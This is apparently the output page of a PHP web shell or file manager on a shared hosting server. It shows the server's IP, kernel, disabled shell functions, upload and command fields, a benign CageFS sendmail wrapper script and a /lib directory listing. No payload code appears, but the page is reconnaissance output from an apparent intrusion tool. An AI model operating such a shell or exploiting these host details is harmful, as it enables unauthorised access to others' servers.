Server IP : 149.255.58.128 / Your IP : 216.73.216.206
System : Linux cloud516.thundercloud.uk 5.14.0-427.26.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 17 15:51:13 EDT 2024 x86_64
PHP Version : 8.2.28
Disable Function : allow_url_include, apache_child_terminate, apache_setenv, exec, passthru, pcntl_exec, posix_kill, posix_mkfifo, posix_getpwuid, posix_setpgid, posix_setsid, posix_setuid, posix_setgid, posix_seteuid, posix_setegid, posix_uname, proc_close, proc_get_status, proc_open, proc_terminate, shell_exec, show_source, system
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Upload Files :
Command :
Current File : /lib//sendmail
#!/usr/bin/bash
##CageFS proxyexec wrapper - ver 16
if [[ $EUID -eq 0 ]]; then
echo 'Cannot be run as root'
exit 1
fi
USR=`/usr/bin/whoami`
TOKEN=`/bin/cat /var/.cagefs/.cagefs.token`
# It's user's tmp directory and write to it is secure procedure
# because this script is running only under usual user
PIDFILE="/tmp/.cagefs.proxy.$$"
USER_INTERRUPT=13
CWD=`pwd`
ctrl_c_handler() {
if [[ -f "$PIDFILE" ]]; then
pid=`/bin/cat $PIDFILE`
/bin/rm -f $PIDFILE > /dev/null 2>&1
/bin/kill -s SIGINT "$pid" > /dev/null 2>&1
fi
exit $USER_INTERRUPT
}
if [[ -e /var/.cagefs/origin ]]; then
ORIGIN=`/bin/cat /var/.cagefs/origin`
REMOTE="/usr/bin/ssh -F /etc/ssh/cagefs-rexec_config $USR@$ORIGIN"
$REMOTE CAGEFS_TOKEN="$TOKEN" /usr/sbin/proxyexec -c cagefs.sock "$USR" "$CWD" SENDMAIL $$ "$@"
RETVAL=$?
else
trap 'ctrl_c_handler' 2
CAGEFS_TOKEN="$TOKEN" /usr/sbin/proxyexec -c cagefs.sock "$USR" "$CWD" SENDMAIL $$ "$@"
RETVAL=$?
/bin/rm -f $PIDFILE > /dev/null 2>&1
fi
exit $RETVAL
Name |
Size |
Last Modified |
Owner / Group |
Permissions |
Options |
.. | -- | February 08 2024 03:37:04 | 0 / root | 0755 | |
.build-id | -- | May 19 2025 17:30:28 | 0 / root | 0755 | |
NetworkManager | -- | March 18 2025 04:04:54 | 0 / root | 0755 | |
binfmt.d | -- | March 18 2025 04:14:45 | 0 / root | 0755 | |
debug | -- | October 13 2023 17:01:13 | 0 / root | 0755 | |
dracut | -- | May 08 2025 21:42:23 | 0 / root | 0755 | |
environment.d | -- | March 21 2025 22:43:24 | 0 / root | 0755 | |
exim | -- | February 05 2024 20:02:55 | 0 / root | 0755 | |
firewalld | -- | February 04 2025 04:03:51 | 0 / root | 0755 | |
firmware | -- | March 21 2025 22:43:57 | 0 / root | 0755 | |
fontconfig | -- | October 13 2023 17:01:38 | 0 / root | 0755 | |
games | -- | March 25 2022 09:42:08 | 0 / root | 0555 | |
gcc | -- | February 12 2025 13:07:08 | 0 / root | 0755 | |
gems | -- | May 06 2025 04:04:19 | 0 / root | 0755 | |
grub | -- | March 19 2025 12:04:22 | 0 / root | 0755 | |
kbd | -- | October 02 2024 20:19:50 | 0 / root | 0755 | |
kernel | -- | March 21 2025 22:43:25 | 0 / root | 0755 | |
locale | -- | April 28 2025 16:07:12 | 0 / root | 0755 | |
modprobe.d | -- | March 21 2025 22:43:25 | 0 / root | 0755 | |
modules | -- | July 30 2024 13:35:18 | 0 / root | 0755 | |
modules-load.d | -- | March 18 2025 04:14:45 | 0 / root | 0755 | |
motd.d | -- | November 25 2024 21:25:08 | 0 / root | 0755 | |
node_modules | -- | May 20 2024 06:02:19 | 0 / root | 0755 | |
pam.d | -- | March 21 2025 22:43:24 | 0 / root | 0755 | |
polkit-1 | -- | December 04 2024 22:44:20 | 0 / root | 0755 | |
python3.9 | -- | December 12 2024 10:11:36 | 0 / root | 0755 | |
realmd | -- | May 30 2024 07:44:38 | 0 / root | 0755 | |
rpm | -- | March 21 2025 22:43:24 | 0 / root | 0755 | |
sysctl.d | -- | March 21 2025 22:43:25 | 0 / root | 0755 | |
sysimage | -- | March 25 2022 09:42:08 | 0 / root | 0755 | |
systemd | -- | March 21 2025 22:43:25 | 0 / root | 0755 | |
sysusers.d | -- | May 22 2025 21:42:21 | 0 / root | 0755 | |
tmpfiles.d | -- | May 22 2025 21:42:21 | 0 / root | 0755 | |
tuned | -- | December 04 2024 22:44:57 | 0 / root | 0755 | |
udev | -- | March 21 2025 22:43:25 | 0 / root | 0755 | |
| | | | | |
cpp | 1.04 MB | February 12 2025 13:11:11 | 0 / root | 0755 | |
motd | 0 KB | April 03 2024 18:29:31 | 0 / root | 0644 | |
os-release | 0.476 KB | March 04 2025 07:04:36 | 0 / root | 0644 | |
sendmail | 1.027 KB | March 21 2025 17:16:13 | 0 / mailtrap | 0755 | |